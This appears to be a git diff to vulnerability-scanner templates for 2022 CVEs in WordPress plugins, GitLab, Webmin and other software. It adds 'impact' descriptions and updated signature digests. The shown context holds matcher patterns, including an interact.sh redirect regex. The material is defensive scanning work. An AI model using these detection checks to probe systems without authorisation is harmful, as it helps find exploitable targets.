+# digest: 4a0a00473045022100dab6b90f8e180b900bb699f0b1f11c4bf3c96cb00f20faf22e9ae88f9e05b299022050d5f6b1a0f53fd1c319b2d783ebf70a0d6bb6fe8accacb208a40aebf47f41bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml
index 5f7647958b..38c2e5898d 100644
--- a/http/cves/2022/CVE-2022-0692.yaml
+++ b/http/cves/2022/CVE-2022-0692.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.
   remediation: |
     Upgrade to version 3.0.1 or later to fix the open redirect vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100ef865daa13fbcee29cc0696e6121806d104e8ed9d4975f91782ffeb8ea53819702203a78d5d6bef0cefc67bc6523f4ba61f4fb1e6fdaf6432747637f638ab7f77744:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a070281a8f4f157b3ca8c5ee576fd70dce4d04697bdda9f507485147e7ed63d0022100fd4bf131dba9b5e993e723c5f3af27b16ae5fda3dcc72457c0423edcd46a78f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml
index caf8a9f14c..3d254ebd82 100644
--- a/http/cves/2022/CVE-2022-0693.yaml
+++ b/http/cves/2022/CVE-2022-0693.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
   remediation: |
     Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Post Meta Setting Deleted Successfully")'
         condition: and
-# digest: 490a0046304402201afe8dca57c55e006f05555b066cd1dada54a87c437ea23736ad968b8ff4f996022073dfe996b8276631e113e4ca0a0a6392603b71f0a2f9a2c2a1d9ea902bdd6f11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207293b7972c51304bc5f89406bef85565cd57a89667e2d063d208ea4e3164bc0502201dc0360ea48915de030e953688fafe90f7c3164f8ecc40ee85cfc78e1c699587:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml
index 384a7676ac..27d5abe46e 100644
--- a/http/cves/2022/CVE-2022-0735.yaml
+++ b/http/cves/2022/CVE-2022-0735.yaml
@@ -5,6 +5,8 @@ info:
   author: GitLab Red Team
   severity: critical
   description: GitLab CE/EE is susceptible to information disclosure. An attacker can access runner registration tokens using quick actions commands, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are from 12.10 before 14.6.5, from 14.7 before 14.7.4, and from 14.8 before 14.8.2.
+  impact: |
+    An attacker can gain access to sensitive information stored in GitLab.
   remediation: |
     Apply the necessary patches or updates provided by GitLab to fix the vulnerability.
   reference:
@@ -108,4 +110,4 @@ http:
         group: 1
         regex:
           - '(?:application-)(\S{64})(?:\.css)'
-# digest: 4a0a004730450221009ca212bdf18334fba3ed4df6f9abac1917f47d15ea0a44b739084d53f8f5465a022001967cb8e9ffca6c82d08fdcabe4d2616b2232358ed9884f0133e34f9002ce60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008a772dd7713148efd8df210523aae888b4794b8280d4ee478bef1da8ce7fb11d022100febb5002655dfc38c0fb39fb8bcd7d736b82d3af5d554f3104d6f87e6bb1f559:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml
index 53d63bb804..4e4eab135d 100644
--- a/http/cves/2022/CVE-2022-0747.yaml
+++ b/http/cves/2022/CVE-2022-0747.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
   remediation: Fixed in version 4.3.8
   reference:
     - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3
@@ -49,4 +51,4 @@ http:
           - 'contains(content_type_2, "text/javascript")'
           - 'contains(body_2, "show_ilist_templates")'
         condition: and
-# digest: 490a004630440220254d0bc8009f6ed60f2e5eb18a6414acd9cd2baeeef7fbe0d22aa50147461f8602200c9b48b951b399c29bf84e07df63fc99d6f220f4f31e0e41848981219c1b08b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203cb1be2972a7db6278dadc8dde9275a903dc5f8ce6b2f679f9f25c651fe626a702206bd3e92f0350a27e753dc88b222e0650e02025487f588a08f7686db224c31978:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml
index 6c3214b33b..a6ab300acb 100644
--- a/http/cves/2022/CVE-2022-0760.yaml
+++ b/http/cves/2022/CVE-2022-0760.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
   remediation: |
     Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "vote_status") || contains(body, "critical error")'
         condition: and
-# digest: 490a004630440220026edf2f0ad70ff3a9c16d3953181b25870efbb53603c4b86622a6ce5c6c314e02204d894f1987c89d965309035479c3c3a6f56f4f20070f06e3da5282d24da219a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200c5e1f6a0952b96397bb25992ca64ae0814f8665096b843620a28c3ac30ae3e9022100db50d5289f6941adbb82747ee355c3e8ad4224c35d4c33279ce209fdb7e09c1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml
index b8110e2665..8d8c16f581 100644
--- a/http/cves/2022/CVE-2022-0769.yaml
+++ b/http/cves/2022/CVE-2022-0769.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "You have to be logged in to leave your rate")'
         condition: and
-# digest: 4a0a0047304502204d951d592de6b9f42fbb9917aaa7261171c679ca920507cf649bc3f0eaa2c813022100ad5397cee1fdb603676a0cc0c29c8f7a0347c1ce1e71a31f76e8bb995bbaf457:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c60aa995b39149f36d63fa12975b34573625b7ed2aad585416c2f1fc80fe03a502206b3402bef132a972fbeeb6d658cd0bf1055bd5901295d08b18e1b21fdadc87ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml
index 955d675a2f..15cfea75fa 100644
--- a/http/cves/2022/CVE-2022-0773.yaml
+++ b/http/cves/2022/CVE-2022-0773.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Update to Documentor version 1.5.3 or later to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - 'contains(content_type_1, "text/html")'
           - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
         condition: and
-# digest: 490a0046304402203d2367a7055b91ce3fb54465fbc52966d05a0252523d41fe45a7d164550a24c702203e3fc72b1a9a4a0f3e1f01b401b0a0f563376bef150253a5038b6a6947ff3160:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201e180c96599aec87c507d64561692775a0ef8d4501951ffb06d39f34fb707093022031d4300c9d3919d6b30b67b14aeef9c188ee258d492a14c225596a1f3a6f5202:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml
index 7a15482e2c..42ee55bdcc 100644
--- a/http/cves/2022/CVE-2022-0776.yaml
+++ b/http/cves/2022/CVE-2022-0776.yaml
@@ -5,6 +5,8 @@ info:
   author: LogicalHunter
   severity: medium
   description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to RevealJS postMessage version 4.3.0 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ headless:
         part: extract
         words:
           - "true"
-# digest: 4a0a00473045022100dd8732ede10a0be69f19118c04ed2d9b30db3e50d385ffa541b45a8fa5b9ef64022005dea63323e51b66628eeb9ec91b8f939e69678e9f08de7b0548fe85e95d0e85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a35d621c95577699841dcc407ea25ab63f4cb585320cc1d9b9bfea9b4ffb98ff02201f0fef010c0f8f8429ceab81f10eee36ed4f0c3136d45ebdc01595b7125cd971:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml
index f6d4164ea0..cd56b781f0 100644
--- a/http/cves/2022/CVE-2022-0781.yaml
+++ b/http/cves/2022/CVE-2022-0781.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Update to the latest version of the WordPress Nirweb Support plugin (2.8.2 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204a770fa573a6a4b10151cb423c0ed8798c2e93756af8f4d77bbc1eceb4faa25c0221009d1df5669c71e3676126b7d9414a3fb9de8b85de1960efdc2faaafb1cce29b5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cc2f687f5f5c804aadc401fc4c076e9bd5499eac73fe5500d65ca52a6af10371022049184fac7ecf750b6a933431a9ab56168eff4adaa0ae5be8d077f90da76b2993:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml
index c6634aaeb8..9dbff39222 100644
--- a/http/cves/2022/CVE-2022-0784.yaml
+++ b/http/cves/2022/CVE-2022-0784.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "{\"images\":")'
         condition: and
-# digest: 4a0a0047304502200fbec6fb0a7867706998bfceeaa1171e436099d775e7e6e1594047d677c6b1f5022100c558c22c53e8686d8d29fc4204f2cc39c9a6057da11019617b11bc220846f3c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009d0c0a56b58f66c67bdb73ccfd89d2b72c05286c8949fb61e437072c3ddaabd8022100afcd50c5dfb5617309abb648e1efd3ee0c76dbef9c8a116884ccde120a805be4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml
index 61f3d21ea9..6570a0c492 100644
--- a/http/cves/2022/CVE-2022-0785.yaml
+++ b/http/cves/2022/CVE-2022-0785.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database and potentially sensitive information leakage.
   remediation: |
     Update to the latest version of the WordPress Daily Prayer Time plugin (2022.03.01) to fix the SQL Injection vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "dptTimetable customStyles dptUserStyles")'
         condition: and
-# digest: 490a0046304402202eb988f212678114d8a80d2d548325b8429c4f4ce7d5aeb43d432eb3e114f4dc022072a80c558dc1f00657444f42632122c6dcf373da57830ffc3a5c09d6f3c1d851:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220781620a43c58692e53a253c8b7a20816547fc083b7057e1b794a2130fad8fbdf022100da45542602f85c7175f94a3b2921c18f6dedf8cffc3d28a247f1413a85fc112d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml
index 5137f858e9..307281cf83 100644
--- a/http/cves/2022/CVE-2022-0786.yaml
+++ b/http/cves/2022/CVE-2022-0786.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the KiviCare plugin (2.3.9) or apply the provided patch to fix the SQL Injection vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Doctor details")'
         condition: and
-# digest: 4b0a0048304602210088e206d71cd6f839598f443e2f12618f70f490a3367c570719fc03fa4f290902022100b8837d554b3f8af5a3e9b5f3b0c1677fe701aa362944d5fbfb0dae038440933a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203917787d4b148db8934c992ab95b67bf2f9b57605f38085577176cc1ce124dad02210088399dbc242f7a5a5a72d05b22de62f80790b7412fc448b5e0eba6ffd2af1dc4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml
index 7338cb8414..e80c56e8d4 100644
--- a/http/cves/2022/CVE-2022-0788.yaml
+++ b/http/cves/2022/CVE-2022-0788.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database.
   remediation: |
     Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "Invalid payment.")'
         condition: and
-# digest: 4a0a00473045022055b11e18f0c342e8787b59614603c3fceb9e9c65517e97701733b9b3d8c9a8f00221008af1eee7642b85a86d294eff9ff5e09e9ad7e3558e59e1619afee96bce6c1811:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200a18f4ad9aa2154e45ea5f3c481c7d00bc006fd1c8cccd7448ce7c678d16e17602205c14752b9890d739d66b3203ef92f510d4ae9c82c9a5541f5aba396960c08570:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml
index 9cabdb312d..a4dc0b6481 100644
--- a/http/cves/2022/CVE-2022-0817.yaml
+++ b/http/cves/2022/CVE-2022-0817.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress BadgeOS plugin through 3.7.0  contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "badgeos-arrange-buttons")'
         condition: and
-# digest: 4a0a0047304502210096fe250f3d7a7d52cff58c56909b33feace62daeedde5e054fc94e3be2cdb2e602200be4204ddbd80b955ca6b6cc66bc82412af3dd24c2a95c83a8c800751a8db4f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022070b79396a24ff749c2982d9925542210f6542380ca0bb5ae83f934acc7c37f37022100b92a7fa703407779a43ed2ebb7025ee323f4a157d5782c578174317eeba88934:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml
index 998d538062..70201b2b5f 100644
--- a/http/cves/2022/CVE-2022-0824.yaml
+++ b/http/cves/2022/CVE-2022-0824.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: high
   description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Upgrade Webmin to version 1.990 or later to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
         part: body
         words:
           - "Failed to write to /{{ranstr}}/index.html"
-# digest: 4b0a00483046022100fc96775189c1842d33da54e8fc77536999b4a2270d237d0fcece11657e13b1a00221008476ba65937da4f4d9ee7c39adc57b932875b8490592c568eec076fa9138ff32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d42cbae3e897888f8ac5c9c0a1583ca529ad7de168e4b68c72cb3bdeb17d52dd022100a0e03afd683652e071ce365c69e02410a2270f474736dc5dc10466ed87cd6a05:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml
index 4ecb4beaf0..2a0df91e2d 100644
--- a/http/cves/2022/CVE-2022-0826.yaml
+++ b/http/cves/2022/CVE-2022-0826.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
   remediation: |
     Update to the latest version of WP Video Gallery plugin (>=1.7.2) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Registred videos :")'
         condition: and
-# digest: 4b0a00483046022100c65f76d238b9531774728ce4bfc7ac8b35bc2018c90309783215cfcd53f1214d022100c04e6cc141af9f9fbe6d2156363d86c9827f37a9446c6e21533a81e886f95499:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220788a005df6bae30eae2ad4eeda0a8ae46efca7604247324db3097e48475a861a022070536dfe57a7930822e90549fcdb78f7701bcef515d93d96ffef769275453d67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml
index cff759d31e..a427e8b417 100644
--- a/http/cves/2022/CVE-2022-0827.yaml
+++ b/http/cves/2022/CVE-2022-0827.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Account added successfully")'
         condition: and
-# digest: 4a0a0047304502207edcc5115f1b233897ca1a4e7877333f576854a3224832bb8ea48f94825f1a0a0221008b5afcafec8f835d25b512f27e738ca37c3736799dc02c13bb0f0a62732072d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100eb8dc269410a8f170b95ede0cd69678b5af6405bd96062d1dbc6b8b8385bdbae022100e30ac25c9713170a3464eff6ff860b2ded0edaefb9d3dc37b849224361b4e90f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml
index fbcb7a58a6..3c7c205745 100644
--- a/http/cves/2022/CVE-2022-0846.yaml
+++ b/http/cves/2022/CVE-2022-0846.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version 2.14.15.1
   reference:
     - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")'
         condition: and
-# digest: 4a0a00473045022100b27181a34ebfe218a4b7da91b399a3e637abf3a11fa2e2bffe3865bef3a57a680220167c6c74427e32dbb8bce913ed4c75daa58608c77c7cdcd2551e9728f4e7066e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022017d86b1ea1b8e2a25e3a5a93b7ccec1f07f4eef43e6a81326bbdf2cb35cf90dc022100b0f9b6fd3da81ddfee54e93cabbb45287049f1e7d2ad7f479dc7e8066f878ed5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml
index f71c546819..8030bd1dde 100644
--- a/http/cves/2022/CVE-2022-0864.yaml
+++ b/http/cves/2022/CVE-2022-0864.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update UpdraftPlus plugin to version 1.22.9 or later to mitigate the vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201fbee6db4183f9a73b0d315af5db86156b8f1a5d03969bb0935d9235e630d92002205dbb92b910552b711c43843de0b9829f6122b87811e0ee2459aec9178aefb106:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210085c62512f0b3da5cefdf4c08c369fe613ca1f8cf303e6df5453e5a1966c9f5ae022100badd20e4287c3d23766ff679a752303af2bc3c147d127107ddb4c4f66a5004cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml
index 0922d40730..7754c54fe4 100644
--- a/http/cves/2022/CVE-2022-0867.yaml
+++ b/http/cves/2022/CVE-2022-0867.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch.
   reference:
@@ -49,4 +51,4 @@ http:
           - 'contains(content_type_1, "text/html")'
           - 'contains(body_2, "ArpPriceTable")'
         condition: and
-# digest: 4a0a004730450220349c28a62273ce28eb4559ad33b93e1b0114a14c19e057a53be54c96429698bb022100e4614b6bee7c666a4915b6cda2266e8864350fe7c5d4f1d740818f786723e92c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009e5929017c8d7639e54dae90cb3a7d4d9a5fc2d71f46dd93c99831cf1c7e115c022100a08b094362bd419c3faf44cc0548f889e28b48549fab05e51fdfd60b03722ad7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml
index 3690f6b0f1..3e792a44c7 100644
--- a/http/cves/2022/CVE-2022-0869.yaml
+++ b/http/cves/2022/CVE-2022-0869.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade to a patched version of nitely/spirit to mitigate the open redirect vulnerability (CVE-2022-0869).
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 490a0046304402201e00caa345d4d13e43b0306c8a0e26beb4d99ffcbb38bdf2a2f8966498da407402206c5a2228d6fba6e8869a9a923be3f65ddd9bd5ce380e8946feac5fb5ed546193:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205de79c5a25b157ee4f56167e91ee46875628d0fe4eb1dc777c139a7924abef1b022100b1a373002f23a2a363bc92ecd452276611bb9565fa40eebc68e95e73762048a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
